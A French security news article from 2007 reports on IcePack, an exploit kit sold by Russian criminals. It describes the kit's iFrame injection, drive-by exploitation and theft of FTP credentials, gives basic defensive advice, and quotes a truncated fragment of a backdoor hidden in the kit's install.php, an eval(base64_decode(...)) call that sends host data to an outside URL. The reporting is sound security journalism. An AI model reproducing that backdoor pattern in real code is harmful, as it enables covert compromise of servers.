Actualité

 

IcePack: La boite à outils pirates

Publié le 19-08-2007 à 17:14:30 dans le thème Virus - Antivirus

Pays : International - Auteur : Damien Bancal


Pub : Découvrez les Labs ZATAZ


Note des lecteurs: 2.5/5

icepackDes pirates russes commercialisent un couteau Suisse du nom de IcePack.


Le moins que l'on puisse dire est que l'outil pirate surnommé IcePack a particulièrement bien été pensé par ses auteurs. Ces derniers signent sous le pseudonyme de IDT. Le premier août dernier, l'éditeur Panda Security classé ce "pack" comme très dangereux. La rédaction de zataz.com a mis la main sur la version Platinium de cette trousse à outils "made in russia".

IcePack est vendu par les pirates sous la forme d'un dossier de 2.35 Mo. Il comporte six dossiers comprenant 279 fichiers PHP et html. Le premier dossier est composé 11 pages php, un fichier dat et un ReadMe au format HTML. Ce document est le fichier d'information sur ce pack.
 
ice pack


IcePack est un outil de piratage servant à installer des malwares sur les ordinateurs en exploitant des vulnérabilités. IcePack permet d'accéder à des pages Web sur lesquelles il ajoute des références iFrame qui pointent vers un serveur sur lequel l'application est installée. L'originalité d'IcePack est que l'insertion de la référence iFrame est effectuée par la boute à outil elle même, comme le montre notre capture écran. Avec Mpack (VOIR) le pirate doit accéder manuellement aux pages web afin d'y insérer les iFrame. A noter que ces fichiers sont des versions évoluées de ceux trouvés dans les outils pirates Mpack. Trois dossiers sont proposés : Admin, Load et Exploits.
 


IcePack, késako ?
Une fois IcePack installé sur un serveur Internet, il faut mettre en place quelques broutilles Mysql, l'outil se lance sur un menu très propre, très clair.Icepack Pour y accéder, un login et un mot de passe sont demandé. Une fois le précieux sésame rentré, IcePack souhaite la bienvenue à l'utilisateur : "Soyez les bienvenus ! Pour se mettre au travail choisissez le point nécessaire dans le menu disposé dans la partie supérieure de l'écran." Un conseil, sortez votre dictionnaire franco-russe. A noter qu'une version anglaise existe, elle est, au moment de l'écriture de cet article, "private". L'outil n'est pas traduit mais est impressionnant de part ses possibilités de nuisance.

Lorsqu'un utilisateur visite une page infectée, l'iFrame active IcePack. Le piége se referme et IcePack va rechercher alors des vulnérabilités sur l'ordinateur. Une fois la faille découverte, la "création" d'IDT télécharge sur l'ordinateur visé un "exploit", un moyen d'exploiter la faille découverte auparavant. Une fois la machine cible "ouverte", Icepack permet de télécharger ce que souhaite le pirate, via une option ftp intégrée directement dans l'outil pirate. Parmi les autres possibilités proposés par ce logiciel vendu 500 dollars par IDT, et beaucoup moins cher par d'autres, exploitation des informations concernant les comptes FTP dérobés sur les ordinateurs infectés. icepackUn outil vérifié la validité des données volées. Il est aussi possible, comme pour les Mpack, de contrôler les ip des cibles, de choisir les failles selon les pays ciblés, ... Près de 200 sites web et accès FTP sont utilisés par IcePack. Des "aides" surtout basés en Russie et Estonie ainsi que quelques url stationnés à Taiwan et en Turquie.

Que faire face à ce genre "d'arme" numérique. Première évidence, mettre à jour son ordinateur, ses logiciels. IcePack travaille avec les failles du moment. Soyez donc réceptif aux mises à jour de vos outils et autres navigateurs. Mettez à jour votre antivirus. Si vous n'en possédez pas, car vous estimez que cela est trop coûteux, des solutions gratuites existent.

Vous pouvez effectuer une analyse de votre ordinateur avec des antivirus gratuits ou encore antivirus en ligne. Il existe aussi des firewall gratuits et des anti spaywares qui pourront vous permettre de contrôler les informations rentrantes et sortantes de votre machine.
 
Attention, danger !
Cet outil n'a rien de "fun". Il cache même en son sein une backdoor, une porte dérobée installée par les créateurs d'IcePack. Cette porte est cachées dans le fichier install.php "eval(base64_decode('ZmlsZV9nZXRfY29udGVud (...) http://datings.1gb.in/c.php?host=' . $_SERVER (...)" Autant dire que les utilisateurs de cette boite à outils risquent de se retrouver avec le double d'ennuis. (CB/ZATAZ)

 

Conseiller cet article RSS ZATAZ Digger cet article ! Partager cet article avec mes amis sur Facebook ! Partager cet article sur del.icio.us

Derniers contenus

Fuite de données d'auditeurs de France Info

29-04-2014 à 12:55 - 0 commentaire(s)

Ip, mail et système informatique des auditeurs web de France Info accessibles aux pirates.

Problème de sécurité pour M6 Boutique

29-04-2014 à 12:10 - 0 commentaire(s)

Un bug sur le site web de M6 Boutique pourrait permettre de piéger les clients de cet espace de télé achat.

Le contrôleur Européen de la Protection des Données a des fuites

29-04-2014 à 11:50 - 0 commentaire(s)

Le site Internet du Gardien Européen de la protection des données personnelles a des problèmes avec sa propre sécurité informatique.

Watch Dogs : plusieurs failles corrigées pour Chicago

28-04-2014 à 14:19 - 0 commentaire(s)

Plusieurs importants sites de la Ville de Chicago corrigés via le protocole d'alerte de zataz.

66 pays visés par un code malveillant dédié aux SMS

28-04-2014 à 11:51 - 0 commentaire(s)

SMS Android OS FakeInst, un logiciel malveillant qui utilise vos SMS pour détourner de l'argent.

Anonymous lance le projet AirChat

28-04-2014 à 11:40 - 0 commentaire(s)

AirChat, un projet Anonymous qui souhaite permettre la diffusion de données numériques par la bande FM.

Google rembourse des utilisateurs d'Android

28-04-2014 à 11:16 - 0 commentaire(s)

Un virus informatique cachée dans une application Android ? Google s'excuse et rembourse les internautes piégés.

Piratage d'une Université pour fabriquer des bitcoins

28-04-2014 à 11:02 - 0 commentaire(s)

Des pirates informatiques ont compromis cinq serveurs de l'Université de l'Iowa pour installer une fabrique de bitcoins.

Sur le même thème : Virus - Antivirus

66 pays visés par un code malveillant dédié aux SMS

SMS Android OS FakeInst, un logiciel malveillant qui utilise vos SMS pour détourner de l'argent.

Google rembourse des utilisateurs d'Android

Un virus informatique cachée dans une application Android ? Google s'excuse et rembourse les internautes piégés.

Un RAT dans de faux courriels American Express

Un code malveillant s'invite dans votre ordinateur pour encore mieux piéger vos smartphones et tablettes.

Un diffuseur Français de logiciels espions condamné

Un jeune internaute Français de 22 ans écope de deux mois de prison avec sursis pour avoir proposés des logiciels espions en téléchargement.

Prudence aux factures de fausses boutiques

Le cyber magasin Hip Hop diffuse des factures piégées. Fausses factures... pour fausses boutiques.

Votre téléphone portable chauffe : la cause à un pirate ?

Vous trouvez que votre smartphone surchauffe ? Un malware est peut-être en train de produire de l'argent pour un pirate.

500000 machines infectées par Windigo

découvert une vaste campagne d’attaques cybercriminelles qui a pris le contrôle de plus de 25 000 serveurs UNIX dans le monde entier.

Un internaute se suicide après avoir reçu le virus Police

Un homme s'est pendu, avec son petit garçon, après avoir reçu le ransomware Police.

 


Syndication RSS

nabaztag

  • http://www.wikio.fr
  • netvibes
  • NewsGator Online
  • Rojo
  • Bloglines
  • Google

ZATAZ mobile et PDA